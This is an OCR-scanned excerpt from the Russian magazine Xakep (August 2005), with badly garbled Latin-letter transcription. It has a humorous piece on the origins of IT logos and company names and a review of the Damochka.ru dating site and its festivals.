са и движения. Ну а какая еще эмблема кроме форточки может быть у ѴѴІп- 
боѵѵз? Сама же винда получила свое название за то, что была первой осью 
с графическим интерфейсом и окнами программ, прищедщим на смену ко- 
мандной строке (не совсем так. Первые наработки графического интерфей- 
са с окнами были представлены еще в 70-х гг. А компания Арріе впервые ис- 
пользовала их в своей ОС в середине 80-х — прим. гпіпсітОгк). 

Новое творение Билла Гейтса носит кодовое имя Бопдітогп. Дело в том, что 
неподалеку от центрального офиса М$ находится горнолыжный курорт, где 
любят отдыхать сотрудники компании (вместо исправления багов в безо- 
пасности ОС), а местный салун (кабак по-нашему) носит имя Бопдііогп. Вот 
так вот. Самый прибыльный продукт на планете наречен в честь пивной. 
Версия, конечно, неофициальная, но другой просто не существует. Какой 
логотип придумать для операционной системы, которая называется «Длин- 
ный рог»? Логично, что изображение представителя крупного рогатого око- 
та. В МІегозоП остановились на быке. И кто после этого скажет, что серьез- 
ное ПО не может иметь в качестве символа животное? 

[тих] Пингвин Туке — это не просто символ БІпих. Я даже не знаю, что яв- 
ляется более известным — сама ОС или ее логотип. Атрибутика с изобра- 
жением Тукса приносит магазинам не меньщую прибыль, чем линуксовые 



дистрибутивы. Пройти мимо него я не мог. Этот логотип появился в 1 996 го- 
ду, когда в мейл-листе Ііпих-кегпеІ-таіІіпд Іізі группа людей предложила вы- 
брать эмблему для своей операционки. Идею поддержали, и была предло- 
жена масса вариантов, в том числе такие благородные зверушки, как лев 
и орел. Среди предложенных логотипов был и пингвин, державший на кры- 
льях земной шар. Но вождь и бог всех линуксоидов — Торвальдс, в одном 
из своих писем упомянул буквально следующее: «Если вы думаете о «пин- 
гвине», вы должны представлять себе слегка растолстевшего сидящего 
пингвина, хорошо поевшего и отрыгнувшего. Он сидит с довольной улыб- 
кой — мир кажется прекрасным, если вы только что съели несколько гал- 
лонов свежей рыбы...». 

Был объявлен конкурс среди художников на лучшее изображение пингви- 
на. Победителем стал Ларри Ивинг, которой утверждает, что использовал 
только свободный софт при написании Тукса, в частности, растровый ре- 
дактор ѲІМР (еще бы он сказал, что юзал фотощоп!). На самом деле, пра- 
вильно называть пингвина «Такс», но в среде компьютерщиков устоялось 
имя Туке. Слово можно объяснить так: Тогѵаібз ПпіХ. 

Кстати, на день рождение Линусу как-то подарили настоящего пингвинен- 
ка, которого сейчас можно найти в Бристольском зоопарке. 

[ІТ-компании] Пришло время рассказать об эмблемах компаний, рабо- 
тающих в сфере информационных технологий. Начнем с Арріе. Дело в том, 
что яблоко — любимый фрукт основателя корпорации Стива Джобса. По- 
сле трех месяцев раздумий над названием для нового бизнеса, Джобс зая- 
вил партнерам: «Я назову компанию 
Арріе, если до 5 часов вы не приду- 
маете ничего лучщего». И то ли о 
Джобсом тогда работали не самые 
эрудированные люди, то ли им про- 
сто было лень напрягаться, но нико- 
му в голову так ничего и не пришло. 

Арріе'з МасіпІозИ — сорт яблок, дав- 
ший имя новой компании и ее про- 
дукции. По другой версии, корпора- 
ция названа в честь звукозаписы- 
вающей студии битлов — Арріе 
согр., так как многие сотрудники и 
руководители были поклонниками 
творчества ливерпульской четвер- 
ки. А вот почему на эмблему поме- 
стили откусанный фрукт, история 
умалчивает. Название выдающего- 
ся производителя ноутбуков ТозбіЬа 
состоит из двух частей: Тои(восток) 
и ЗИІЬа(трава). Как же связаны ком- 
пьютеры и трава? Очень просто, 
корпорация возникла после объеди- 
нения двух промышленных гиган- 
тов — Токуо ЕІесГгіс и ЗІтІЬаига, и по- 
лучила новое название — Токуо ЗІтІ- 
Ьаига, сокращенно — ТозбіЬа. 

Известный производитель комплек- 
тующих — РиіІІзи, назван в честь го- 
ры Фудзияма. Для японцев Фудзия- 
ма — святыня, национальное достоя- 
ние, и, вообще, их японское все, так 
что это не удивительно. 

Интересна история Сапоп. Сначала 
корпорация носила имя Кѵѵапоп — 
так звали буддийскую богиню мило- 
сердия. Но тысячерукая богиня, изо- 



браженная на эмблеме, европейской публике по вкусу не прищлась. Ком- 
пания сменила название на более благозвучное Сапоп, которое имеет мно- 
го глубокомысленных значений в религии и искусстве, и убрала богиню с 
логотипа. 

ѴІеѵѵзопІс, один из самых крупных в мире производителей мониторов, на 
своей эмблеме разместил трех разноцветных попугаев (это канарейки :) — 
прим. тІпгіѵѵОгк). Заморачиваться над поиском смысла не нужно — обыч- 
ный маркетинговый ход. Красивые цветастые птички располагают к себе 
покупателя и хорошо гармонируют с мониками. 

Крупнейший в мире оператор связи АТ&Т имеет логотип в виде глобуса. Он 
символизирует нашу планету, опутанную сетью коммуникаций. ІМНО, лого- 
тип стоило бы сменить, потому что у них в Америке связь отличная везде, 
а вот в России на дачу мобильный можно не брать — все равно зоны по- 
крытия нет. Хотя сотовые операторы и у нас есть неплохие. Например, Би- 
лайн. Раньше эмблемой компании была трудолюбивая пчелка (Ьее — пче- 
ла), за которую абоненты сети получили прозвища пасечников и пчело- 
водов. Не знаю, чем не угодило это милое насекомое руководителем ком- 
пании, но логотип сменили на круг с желто-черными полосками. Как утвер- 
ждают представители ВымпелКом, «Новый образ «Билайн» символизиру- 
ет яркость, простоту, дружественность, положительные эмоции». Вот так, а 
сразу и не догадаещься. 

Свободный софт в лице проекта ОНН (ОМУ Моі Упіх) обозначил себя анти- 
лопой. Действительно, что париться с поиском логотипа, когда твоя органи- 
зация называется ОМУ? Впрочем, говоря по-английски, нельзя забывать. 





уберите ослов — идет огнелио! 




тот самый Туке 



I КОЗЛИК ФРЭНК и ХАРОЛЬД СИНЕЗУБЫЙ I 

Козлик Фрэнк — талисман портала ІіѵеіоигпаІ.сот. Как написано на его 
личной страничке, Фрэнк помогает с программированием, отвечает на за- 
просы в службу технической поддержки. Хм. А вот тут создатели Живого 
Журнала прикололись неудачно: заявить, что в техподдержке сервиса си- 
дят, простите, козлы — не самое лучшее решение. 

Харольд Синезубый — это такой скандинавский король из Средневеко- 
вья. Правил мудро, объединял викингов, сделал христианство местной 
религией. А тысячу лет спустя другие скандинавы, из компании Егіевзоп, 
создали новую беспроводную технологию передачи данных. Назвали ее 
«синий зуб» — Ыиеіоіб, продемонстрировав всему миру преемственность 
поколений у северных народов. 




]АѴА 

5ип Сегіфесі )аѵа 

РПООНЛПѴМЕІ? 



после написания пары сотен строк кода, нет ничего лучше- 
го, чем чашечка кофе! 



[хакер 08 [80] 05 > СЦЕНА 087 ] 








[хакер 08 [80] 05 > СЦЕНА 088 ] 



что в слове апіеіоре дгш, д — немая, 
а при произношении аббревиатуры 
эту букву нужно обязательно прого- 
варивать (так сказал Сталлман, а с 
ним лучше согласиться). 

[языки программирования] Кодинг — 
многозначительное слово для каж- 
дого читателя Хакера. Бессоные но- 
чи за компом, книги и НТРМ, компи- 
ляторы и отладчики... Но не каждый 
мегапрограммер знает, почему его 
любимый язык имеет именно такое 
название и эмблему. Например, 

РЕВБ — это аббревиатура от Ргасіі- 
саі Ехігасііоп апб Нерогі Еапдиаде, 
что переводится как «язык для прак- 
тического извлечения данных и со- 
ставления отчетов». Символ перла — 
верблюд. Нет, не потому, что кодить 
на этом языке могут лишь выносли- 
вые и терпеливые, как корабль пу- 
стыни, личности. Просто известное издательство О'НеіІІу на обложку книги 
по программированию на перле поместили верблюда — традиция там такая, 
помещать животных на обложки компьютерных учебников. Книга стала ми- 
ровым бестселлером, а африканское животное стало ассоциироваться с по- 
пулярным средством ѴѴЕВ-разработки. 

Еще один небезызвестный язык — руІРоп. Думаешь, он назван в честь 
змеи? На самом деле название получено в честь популярного в 70-е го- 
ды комедийного телесериала «воздушный цирк Монти Пайтона» , фа- 
натом которого был создатель языка. Впрочем, разработчики уже и са- 
ми забыли историю происхождения имени руіітоп, и поместили на эм- 
блему змею. У мультиплатформенной )аѵа в качестве логотипа — ды- 
мящаяся чашка. Увы, официальной версии объясняющей эту эмблему 
нет. Остается только предположить, что это вызвано всеобщей любо- 
вью программистов к кофе, хотя по логике надо было делать символом 
пивную кружку. Такое же название, как этот язык программирования, 
носит популярный сорт кофе. 

[софт] Один из самых популярных браузеров — МогіІІа, получила свое наз- 
вание из слияния слов Мозаіо (первый Интернет-обозреватель) и КІІІег. По- 
лагаю, что под убийцей подразумевалоись: убийца оперы и ІЕ. А логотип — 
тиранозавр, был выбран благодаря созвучности слов МогіІІа и ОосігіІІа. 
Облегченная версия МогіІІа носит имя РігеРох — огненная лиса. Она же — 
бывший РІтоепіх, она же — бывший РігеЫгсі. Смена названий вызвана тем, 
что постоянно находился другой одноименной продукт, разработчики кото- 
рого были не в восторге от использования их лейбла в чужих проектах. Эм- 
блема Ріге^ох — лиса, обхватывающая огненным хвостом земной шар. Мол, 
огнелио — самый быстрый броузер ѴѴеЬ. Хотя я бы не стал искать здесь 
особой идеи, потому что дизайнеры перерисовавшие логотип 4 раза были 
готовы изобразить хоть лису, хоть крокодила, хоть семейство белых медве- 
дей, лишь бы потом не переделывать изображение в пятый раз. 

Система обмена мгновенными сообщениями ІСО является одним из самых 
популярных сервисов глобальной сети во всем мире. Компанию МігаЬІІІз, 
обеспечивающую работу системы ІСО, в 1996 году основали 4 израильских 
программиста. МігаЫІІз — это солнцелюбивый, ароматный и ядовитый цве- 
ток, обладающий галлюциногенными свойствами. Видимо, изральские ко- 
деры так проперлись от этих галлюциногенов, что назвали в честь цветка 
компанию и сделали его своей эмблемой. 

Одна из самых популярных баз данных в сети — РозІдгеБОЕ. Символом 
проекта был выбран слон, так как любимой книгой одного из ведущих раз- 
работчиков являлась «Слоны могут вспоминать» Агаты Кристи. Не знаю, 
как связана литература и базы данных, но факт остается фактом. 

Говоря о программном обеспечении нельзя не упомянуть хакерский 
софт. При заходе на официальный сайт лучшего сканера уязвимостей 
всех времен и народов — ттт.іпвесиге.огд, тебя встретит выразитель- 
но смотрящий глаз. Сперва я подумал, что создатели Мглар насмотре- 
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обложка к диску с ОрепВБО 3.6. 
РиНу фигурирует в образе шерифа 







"слоны могут вспо- 
минать" 




один из вариантов изо- 
бражения культового 
цветка 




демон — и не каких ■ одногорбый верблюд 
чертей! Н — символ РЕНЕ 




лись «Властелина колец», и под впечатлением от увиденного выбрали в каче- 
стве логотипа всевидящее око, но потом оказалось, что глаз обозначает не- 
возможность скрытия от сканера уязвимостей в ПО удаленного компьютера. 



[З.Ы.] Что же, отведенное мне место заканчивается. Я постарался рассказать 
тебе о самых интересных логотипах и именах мира, в котором мы живем. Мира 
сетей и коммуникаций, компьютеров и программного обеспечения, мира ІТ. Те- 
перь ты знаешь смысл того, о чем раньше и не задумывался. Впрочем, главное 
не эмблема и название, а то, что они символизируют. У производителя монито- 
ров главное качество дисплея, а не логотип компании. Побольше тебе на жиз- 
ненном пути красивых эмблем, созданных для качественных продуктов 0 



I ПРОИСХОЖДЕНИЕ НАЗВАНИЙ 
НЕКОТОРЫХ ІТ-КОРПОРАЦИЙ I 
Ѳоодіе — название было выбрано из-за слова ОоодоІ, 
что означает единицу со ста нулями. А Ооодіе было написано 
на чеке, который создатели поисковика получили от первой 
фирмы-инвестора. В результате чего они решили назвать пор- 
тал именно так. 

Ноітаіі — основателю ресурса, Джеку Смиту, пришла мысль 
создать сервис, благодаря которому можно получить доступ к 
почте через ѴѴЕВ. Когда он стал перебирать названия для проек- 
та, заканчивающиеся на таіі, то остановился на боітаіі, так как 
в нем содержатся буквы НТМЕ (язык гипертекстовой разметки). 
Кобак. К — любимая буква основателя корпорации Джона 
Истмена. Вдобавок, пишется на всех языках мира одинаково. 
Джон искал слова, которые и начинаться, и заканчиваться, бу- 
дут этой лучшей в мире буквой. И, смотрите же, нашел. 

Уабоо — слово придумал писатель Джонатан Свифт, обозна- 
чив им плохого, мерзкого человека. Создатели Уабоо! — Дже- 
ри Янг и Дэвид Фило назвали свой сервис так, потому что са- 
ми считали себя уабоо'ми. Что-то типа падонков, только аме- 
риканских. Официально яху расшифровывают как Уе( Апоібег 
НіегагсбісаІ ОНісіоиз Огасіе — долго, небось, придумывали... 
СІ8С0 было создано по легенде. От одной мегаважной бумаги 
в компании оторвался кусочек, на котором были написаны эти 
пять букв (СІ 8 СО), и руководство решило, что это знак свыше. 
Ну а что, все может быть. 

Мокіа. Так назывался финский город, в котором находился 
первый завод компании. А город назывался так потому, что 
находился на одноименной с будущим сотовым гигантом реке. 
Вот так вот. 



антилопа ГНУ 
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090 

Знакомься 
с огоньком 

ЕЖЕДНЕВНО ПЯТЬДЕСЯТ ТЫСЯЧ ЧЕЛОВЕК 
НАТРАВЛИВАЮТ СВОИ БРАУЗЕРЫ НА ЭТОТ 
САЙТ. ЧАСТЬ ИЗ НИХ — ОДИНОКИЕ СЕРДЦА, 
КОТОРЫЕ ИЩУТ СВОЮ ВТОРУЮ ПОЛОВИНКУ 
и АКТИВНО КОНСПЕКТИРУЮТ МЫСЛИ и ПЕРЕ- 
ЖИВАНИЯ В ОНЛАЙН-ДНЕВНИКЕ. ДРУГИЕ ЗА- 
ХОДЯТ ТОЛЬКО ДЛЯ ТОГО, ЧТОБЫ ПОЧИТАТЬ 
ЗАПИСИ ДРУЗЕЙ И ПОИГРАТЬ В МНОГОЧИС- 
ЛЕННЫЕ ИНТЕРАКТИВНЫЕ ИГРЫ. КАК БЫ ТО 
НИ БЫЛО, ИНТЕРНЕТ-ПРОЕКТ ОАМОСНКАЯи 
ПОЛЬЗУЕТСЯ ОГРОМНОЙ ПОПУЛЯР- 
НОСТЬЮ, и МЫ НЕ могли МИМО НЕГО 

ПРОИТИ I ЫМі (ИіпШгеаІ. хакер. ги) 

Рандеву с Дамочкой 



[тетки! тетки!] Если ты уже собрался перелис- 
тывать страницу, решив, что этот проект посвя- 
щен женщинам и их проблемам, остановись! Ког- 
да найдешь свою ненаглядную, мне же спасибо 
скажешь. Именно так, Дамочка.ру — это в первую 
очередь самый популярный сайт знакомств, и ты 
можешь запросто склеить здесь хорошенькую 
подружку, просмотреть ее анкетные данные, отп- 
равить ей внутреннее ЗМЗ сообщение, почитать 
дневник и, наконец, поиграть с ней в «Любовь о 
Первого Клика». Я думаю, что «ассортимент» из 
255 тысяч теток на сегодняшний день не так уж и 
плох. Правда, парней там в полтора раза больше, 
но они ведь тебя не интересуют, я надеюсь? ;) 
Вернемся к порталу. Сразу бросается в глаза 
приятный, а главное легко читаемый дизайн и ак- 
куратное распределение меню: раздел с новостя- 
ми — слева, а прочий текст — справа. Ньюсы ре- 





гулярно обновляются, и там часто проскакивает инфа о намечающихся тусах. Также неотъемлемой частью индек- 
са являются Дамочадец и Дамочадка (именно так повелось называть пользователей сайта) дня, которые выска- 
зывают свою сильную мысль или просто изливают душу на главной страничке сайта. Фильтрация материала ре- 
дакторами здесь похлеще естественного отбора Дарвина — лажа на индекс не попадает. Внизу странички выяв- 
лены именинники дня, которым можно сказать несколько приятных слов посредством ЗМ8. 

Чтобы стать участником сетевых утех на Дамочке, получить полный доступ к анкетам девушек и возможность ли- 
цезреть все их фотографии, необходимо пройти регистрацию. Для начала нужно придумать себе логин и ник. По 
поводу последнего не заморачивайся, так как в любой момент его можно будет поменять. После того, как зареги- 
стрировался, желательно отредактировать свою анкету: ввести физические данные, подробно расписать увлече- 
ния, добавить фотографий и так далее. Многие тетки составляют о тебе впечатление по анкете. После регистра- 
ции ты становишься полноценным домочадцем и можешь... 

[...читать и вести дневник] Помнишь статью про Живой Журнал в 69 номере? Так вот, сетевой дневник мож- 
но вести и на Дамочке. Пусть в удобстве и функциональности дамочкин аналог немного и уступает ЖЖ, но не в по- 
пулярности — это точно. На сайте зарегистрировано более двухсот тысяч дневников. Каждый из них имеет свое наз- 
вание, независимое от ника. Например: АІепка — «истории из жизни животных», МгѴѴгНег — «эротические расска- 
зы», или более банальное — тагіпа18 — «обо мне». Для каждого дневника ведется статистика: рейтинг, определя- 
емый суммарным количеством часов, проведенных юзерами за чтением дневника; количество записей, коммента- 
риев и читателей. Каждому посту можно присвоить свою дату, если ты не согласен с директором мира по поводу те- 
кущего календаря. Эта фишка полезна в тех случаях, когда хочется прикрепить какой-то пост выше других, чтобы 
он всегда был на виду. Тогда его датируют какой-нибудь запредельной датой, типа 2010 года, и дело в шляпе. 
Очень модная фича у дамочадцев — использовать возможность «прикрепить картинку», когда пост сопровожда- 
ется маленькой тематической иллюстрацией, при нажатии, естественно, увеличивающейся. 

Система друзей реализована через добавление себя в «постоянные читатели» дневника. 

В общем, просмотрев фотографии в анкете девушки и прочитав ее инфо, советую заглянуть в дневник (если она его, 
конечно, ведет). Тогда ты узнаешь, как и чем она живет и думает, сможешь подобрать нужный ключик к ее сердцу. 

[...общаться] На Дамочке есть внутренний сервис коротких сообщений (СМС), благодаря которому, народ мо- 
жет общаться наедине. Сервис выполнен на высоком уровне, оптимизирован почти под все браузеры и наделен 
всякими полезными прибамбамсами, вроде хистори, контакт-листа и множества смайликов. Для более удобного 
общения программисты проекта даже создали специальную программу — «ДамаФон», которая позволяет быстро 
и легко достучатся до любого человека из твоих контактов. Кодерам показалось мало своего детища в виде от- 
дельной проги, и они создали аналогичный плагин к Мігапб'е. 

Помимо общения в реальном времени, дамочадцы могут обмениваться информацией на форуме, который поде- 
лен на много разных тематических разделов (любовь, секс, искусство, спорт, тусовки и т.д.), за которыми следят 
строгие, но справедливые модераторы. 

[...играть в ЛПК] «Любовь с Первого Клика (ЛПК)» — одна из самых интересных и аддиктивных онлайновых 
игр. Это сетевой аналог известной телепередачи, ни в чем не уступающий оригиналу. Разве что призы в виде кру- 
госветного путешествия тут никто не выдает. За время существования игры совпали тысячи пар, из которых оп- 
ределенный процент встретился в реале, и некоторая часть из них даже вступила в брак. 

Зайдя в игру, ты попадаешь в некий зал ожидания — скопление ников, чья очередь попасть в игру пока еще не 
подошла. Парней там обычно больше, поэтому, чтобы дождаться нового тура (особенно в ночное время), обычно 
приходится немного подождать... ну или стать девочкой :). Время, когда тебя выкинут поиграть, зависит от твоего 
ЛПК рейтинга. Если он отрицательный, то тебе могут даже на время запретить доступ к игре, чтобы расчистить 
дорогу новым потенциально хорошим игрокам. 

Когда ты, наконец, дождешься своей очереди и попадешь в тур игры, тебе предстоит ответить на три вопроса от 
трех девушек. Ты сразу сможешь составить визуальное впечатление, так как увидишь их фотографии, а также уз- 
наешь в лицо своих соперников-парней, и если захочешь, то можешь просмотреть все анкеты целиком. 

Здесь ты должен будешь поставить каждой девушке оценку за вопрос по пятибалльной шкале. Ок, ответил на воп- 
росы — теперь подожди немного и увидишь, что интересного написали девушки в ответ на твой риезііоп. Снова 
их оцениваешь и выбираешь самую-самую, или же можешь проголосовать «против всех». Совпавшей паре отсы- 
лается по почте подробная информация друг о друге вплоть до е-таіі адреса, обычно скрытого в анкете. 

Что касается ЛПК рейтинга, разобраться в нем без бутылки — трудновато. Смысл в том, что если ты сыграл бо- 
лее 10 игр, твои очки рассчитываются по формуле (среднее количество баллов за игру * корень квадратный из 
числа сыгранных партий). Баллы за игру зависят от того, какие оценки ты получил за свой вопрос, ответы от де- 
вушек и за факт выбранности. Если же число твоих игр не превышает десяток, то рейтинг временно неопределен. 
На сайте можно ознакомиться о чартом лучших игроков в «Любовь о Первого Клика» (отдельно юношей и деву- 
шек). Как правило, это сильные, интересные личности о чувством юмора. Также доступна информация о самых 
часто задаваемых вопросах и статистика: сколько сыграно партий, сколько совпало пар и так далее. 



[...назначать и динамить :) свидания] «Место Встречи» — находка для скучающих юношей и девушек. За- 
дача этого сервиса — позволить встретиться молодой парочке и приятно провести время. Система такова: созда- 
ешь анкету с подробными ожиданиями от встречи, пожеланиями и предпочтениями и отправляешь ее на сервер. 




Гульчитай ш индексная страница Дамочки 



[хакер 08 [80] 05 > СЦЕНА 091 ] 






[хакер 08 [80] 05 > СЦЕНА 092 ] 



Анкета не очень большая, зато все вопросы подобраны очень умело и точ- 
но, так что качество компенсирует количество. 

“Настраивается» пол партнера, его возраст, а заодно и рост с весом. Мож- 
но отфильтровать всех девушек без фотографий. Немаловажный пункт ме- 
ню — это «цель». От того, как ты заполнишь данные, зависит, встретится 
ли тетка с тобой ог поі. Выбрать можно такие варианты: прогулка (с воз- 
можными подпунктами: город, парк, магазин, кафе); посещение мероприя- 
тия (кино, театр, выставка, музей, концерт); посидеть дома (здесь нужно от- 
метить, приглашаешь ли ты даму к себе домой или желаешь стать гостем); 
вечерние развлечения (клуб, дискотека, боулинг, бильярд, казино, ресто- 
ран); другое. Когда отметишь нужные галочки, обрати внимание на поле 
«Подробнее». Настоятельно рекомендую заполнить его, причем грамотно и 
оригинально. Дополнительные опции позволяют поставить партнершу в из- 
вестность, есть ли у тебя машина, много денег :), пристрастие к алкоголю 
и никотину. Ну, а «рассчитываю на знакомство» (мимолетное приключе- 
ние/продолжительные отношения/поиск спутника жизни), расставит все 
точки над і и предостережет тебя от избитых вопросов со стороны пассии в 
духе; «зачем я тебе нужна?». 

Ок, заполнив анкету, ты попадаешь на новую страницу, где выбираешь го- 
род, район и желаемый день встречи, а также способ связи с тобой (зтз/е- 
таіі/телефон), если кто-то клюнет на твою заявку (хааа, наивный!). Распра- 
вившись о формочками, ты наконец перейдешь к страничке с заявками де- 
вушек, которые наиболее соответствуют твоим условиям. Выбираешь пон- 
равившуюся красотку и жмешь «пригласить». Удачно погулять ;). 

[...оценивать и быть оцененным] В игре «Гюльчатай» можно сидеть 
и целыми часами оценивать фотографии других дамочадок и дамочадцев. 
Фотки появляются в рандомном порядке (для тех, кто любит посидеть в 
большой военной машине, перевожу; вразнобой), чтобы не было накруток. 
Для удобства выбора все фотки распределены по категориям — «общая», 
«эротика», «юмор» и даже, внимание, «похабщина» ;). Разместив свою фо- 
тографию в «Гюльчатае», ты в скором времени узнаешь о себе много ин- 
тересного. А именно; сможешь посмотреть, кто и сколько баллов тебе пос- 
тавил, а также почитать возможные комментарии. Вдруг какая-нибудь кле- 
вая чикса влепила тебе 10-ку, и у вас с ней завяжется бурный роман? У ав- 
тора статьи такое бывало. Правда ему трояк влепили, что его задело и под- 
толкнуло к встрече :). 

Да, чуть не забыл. Если ты будешь сидеть сложа руки, то твоя фотка никог- 
да и никому не будет показана. От тебя требуется время от времени самому 
оценивать других парней (ахтунг!) или девушек, тем самым набирая баллы. 
Эти самые баллы и будут расходоваться, когда начнутся твои «показы». На 



I ДАМКИ I 

Сабж — это специальная валюта страны Дамолэндии, позво- 
ляющая получать доступ к дополнительным сервисам. Одна 
дамка по курсу равна одному рублю. У тебя есть специальный 
кошелек, напоминающий основными функциями ѴѴеЬМопеу 
Кеерег. Поддерживает он запись истории платежей с подроб- 
ными комментариями, что есть вери гуд, согласись. Пополнить 
свой баланс можно либо вручную через те же вебманьки или 
используя систему ВиРау, а можно прибегнуть к помощи офи- 
циальных дилеров дамки — людей, с которыми ты уже сам до- 
говоришься о том, как и чем расплатиться. Список таких лю- 
дей находится там же, в кошельке. Ну, затратные способы я 
перечислил. Дамки можно получить и нахаляву; например, вы- 
играть их в лотерее. Многие люди проводят лотереи с разны- 
ми ставками, поэтому если играть с умом, то можно приумно- 
жить свой капитал, чтобы... 

Чтобы можно было изменить цветовую схему анкеты (120 да- 
мок); разослать всем пользователям онлайн сообщение (999); 
использовать расширенный поиск человека (180); сделать се- 
бе особый статус (2100); получить неограниченное по объему 
хистори (800); купить 100 показов в «Гюльчатае» (50); убрать 
лимит в 20 фотографий (1500); создать голосование (30) или 
подписаться на новые регистрации и получать в течение меся- 
ца на мыло информацию о новых дамочадцах, соответствую- 
щим указанным критериям (50000). 

Ах да, на главной странице сайта всегда красуется ник и фо- 
тография одного пользователя — это царь горы. Чтобы по- 
пасть в цари и показать себя пятидесятитысячной аудитории, 
нужно поучаствовать в аукционе и поставить максимальную 
ставку (в дамках). Пока не пройдет полчаса или тебя никто 
не перекупит, ты будешь висеть на сайте и привлекать вни- 
мание клевых чикс. 




рыцарский поединок в лучших его традициях 





НАМеІІеОМ; отец и действующий админ 
Дамочки 



лицо простая система; 

«чем больше ты смот- 
ришь и оцениваешь, 
тем больше раз тебя 
покажут». Единственное, 
советую не перебарщивать о количеством оцененных девушек за один 
раз,так как потом твоя фотка может попасться одной и той же девочке нес- 
колько раз, тем самым снизив КПД. А иногда даже и оценку, когда нервные 
ангельские создания начинают злиться и ставить единички ;). Поэтому 
действовать лучше в несколько заходов — через 4 часа, например. 



[...и просто развлекаться] Среди остальных развлечений можно вы- 
делить интеллектуальную игрушку; «О, щас лифчик» ака «Кто хочет перес- 
пать с миллионером». Не попал на ТѴ? Давай сюда. Смешное представле- 
ние Диброва в лифчике забавляет, но играть не мешает, а борьба за рей- 
тинг заставляет возвращаться снова и снова. 

«Половинка» показывает список особей противоположного пола, которые 
подходят тебе по характеру. Определяется это путем соц-теста, который 
можно пройти здесь же. Ах да, еще для москвичей прямо о сайта можно 
собрать и заказать девушке букет цветов. 



[... а также тусоваться] Какое бы виртуальное общение ни казалось 
интересным, но оно никогда не заменит реальных тусовок. Поэтому 
дамочадцы регулярно устраивают встречи и отрываются на всю ка- 
тушку. Гуляя по сайту и читая дневник, ты получишь приглашение по 
згпз на очередную вечеринку дамочадцев. Идти или нет — выбор твой, 
но обрати внимание на то, что зачастую организаторы устраивают раз- 
личные сюрпризы (например, бесплатное шампанское дамам при вхо- 
де), одаривают дамочеками номиналом в 50 дамок и многое другое. 
Ребята, изъявившие желание посетить тусу, отписываются в специаль- 
ном топике, там же заодно и знакомятся. Атмосфера очень дружелюб- 
ная, чувствуется, что народ сплоченный, хотя и едва знакомый. Люд 
здесь разный; от студентов до бизнесменов, но на время ночной вече- 
ринки соцстатусы испаряются, пафос стремится к нулю, а коллектив- 
ный расколбас — к бесконечности. 

Помимо постоянных мини-тусовок, проводятся и огромные фестивали под 
названием «МЕГАДАМ» (юмористы обычно пишут «МегаДам»), Пока их 
прошло три, но готовится четвертый — в городе Сочи. 

Первый фестиваль «МЕГАДАМ» прошел в Питере 6 декабря прошлого го- 
да в Балтийском Доме. Кассы открывались в 21 ;00, но толпа нетерпеливых 
дамочадцев собралась у нее несколько раньше. Никто не подозревал, что 








народу будет так много 
(примерно 3000 чело- 
век). Результатом стали 
очереди повсюду и боль- 
шое скопление народа. 
Т етеньки-гардеробщи- 
цы, пользуясь момен- 
том, брали по 10 руб- 
лей за размещение верх- 
ней одежды на крюч- 
ках и пропуск в туалет. 
С началом дискотеки, 
открылось ФотоАтелье, 
где все желающие мог- 
ли увековечить себя в 
памяти '«МЕГАДАМа-1». Бармены, 
тем временем, активно мещали кок- 
тейли о названиями игр Дамочки. 
Помимо главной площадки, функ- 
ционировали еще две, поменьще. 
На рок-площадке за ночь выступи- 
ло два десятка различных коллек- 
тивов. На второй, сменяя друг дру- 
га, устраивали расколбас разные 
диджеи. Здесь можно было, по ме- 
ре необходимости, уйти от всех кон- 
курсов и замкнуться в себе. Напро- 
тив сцены все желающие могли 
воспользоваться отличным пир- 
оинг-сервисом, причем почти бесп- 
латно. Любители экстрима могли 
сделать себе прокол на интимном 
месте и поучаствовать в специаль- 
ном конкурсе, который проводился 
на главной сцене. В конкурсе победил главный мегаэкстремал, проткнув- 
щий себе крайнюю плоть. Велика же была его «радость», когда после про- 
цедуры ему сообщили, что теперь о сексе он может забыть на полгода ми- 
нимум. Ближе к утру прощел розыгрыш таких призов, как веб-камера, со- 
тен ссі-дисков, интернет-карт, маек и т.д. А в 6:30 уставший диджей объя- 
вил о закрытии шоу и врубил «Танец маленьких утят», чем вызвал заслу- 
женные аплодисменты. 

14 февраля, в день всех влюбленных, а вернее, в ночь, прошел фести- 
валь «МЕГАДАМ-2». На этот раз городом встречи стала Москва, а мес- 
том — Дворец Спорта «Сокольники». Программа началась с того, что 
под музыку из «Бременских Музыкантов» на сцене появились ведущие, 
которые завели толпу конкурсом, у кого больше «французских писем 
любви» (так называют презервативы). Победитель предъявил 27 этих ре- 
зиновых изделий, но не успел нарадоваться своей крутости, как ведущий 
расстегнул рубаху и продемонстрировал целый патронтащ этих штук, 
опоясывающий его тело несколько раз. 

Прищедшие москвичи могли лично убедиться в том, что миф об уродцах, 
населяющих сайты знакомств — действительно миф. Среди дамочадцев 
можно было увидеть много стильных симпатяг. Где-то в час ночи на сцену 
выщел юноща и исполнил песню под гитару, которая всем очень понрави- 
лась. В толпе щушукались: «Кто бы это мог быть? Какой у чела ник?» Хо- 
тя, если бы присмотрелись получще, узнали бы Родиона Г азманова — дав- 
него поклонника Дамочки. 

Вскоре начались бесконечные конкурсы, периодически прерываемые 
короткими танцевальными блоками. Чего только не было в эту ночь на 
сцене. Яйца били, клавиатуры ломали, считали презервативы, дрались 
на подущках. Но самым скандальным оказался конкурс «успей на стул». 
Как только первый человек выбыл из игры, ведущие, к удивлению всех, 
попросили удалиться четырех «победителей», а жертву приковали к 
стулу. На сцену грациозно выпорхнула стриптизерща и станцевала при- 
ват-танец с ощалевщим дамочадцем, вследствие чего последний остал- 
ся лищь в рубащке, которую нельзя было снять из-за удерживающего 
ремня. Среди новинок «МЕГАДАМа-2» можно выделить рыцарский тур- 
нир, в котором домочадцы могли прокачать свой скилл боев на мечах. 
А в пять утра наступил дате оѵег. 

И, наконец, третий по счету фестиваль прошел снова в Питере. Из от- 
личительных черт можно отметить раздачу дисков «Дамочка оф- 
флайн», которые, надо бы оказать, сначала должны были продавать- 
ся за деньги, но после некоторых технических неполадок и переноса 
«МЕГАДАМа» на более поздний срок, организаторы решили сделать 
дамочадцам подарок. 

В этот день был проведен единственный тур игры «ЛПК-Офлайн» на 
сцене, который всем понравился. Далее последовали многочисленные 



веселые конкурсы от зажигательных ведущих Бороды и Кулщоу. Кста- 
ти, самый удивительный и повергщий зал в щок конкурс заключался в 
том, что нужно было отыскать девущку с зелеными ...трусами. Девущ- 
ка нащлась, не постеснялась выйти на сцену и получить приз в виде... 
тысячи долларов США. 

Кроме главной сцены, функционировал еще и танцпол. Диджей, судя по от- 
